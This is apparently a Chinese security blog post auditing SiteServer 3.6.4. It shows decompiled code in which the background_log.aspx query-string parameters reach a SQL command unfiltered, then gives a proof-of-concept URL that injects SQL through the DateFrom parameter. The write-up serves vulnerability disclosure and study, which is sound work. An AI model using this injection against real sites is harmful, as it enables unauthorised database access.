您的位置 » 首页 » 代码审计 » 代码审计:siteserver最新版3.6.4 background_log.aspx页面sql注入漏洞

代码审计:siteserver最新版3.6.4 background_log.aspx页面sql注入漏洞

发表于3年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年12月26日 | 文章热度:64,061 次 全屏阅读

显示不全请点击全屏阅读

存在siteserver/platform/background_log.aspx

用.NET Reflector 反编译BaiRong.BackgroundPages.dll这个文件

查看代码如下:

this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString; 
  
    flag = base.Request.QueryString["UserName"] != null; 
  
    if (!flag) 
  
    { 
  
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(); 
  
    } 
  
    else
  
    { 
  
        this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]); 
  
    }

所有的参数都没有进行有效的过滤

http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101’%20and%20@@version=1%20and%201=’test&DateTo=test

作者:小新

Tags:

SiteServer漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3587/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)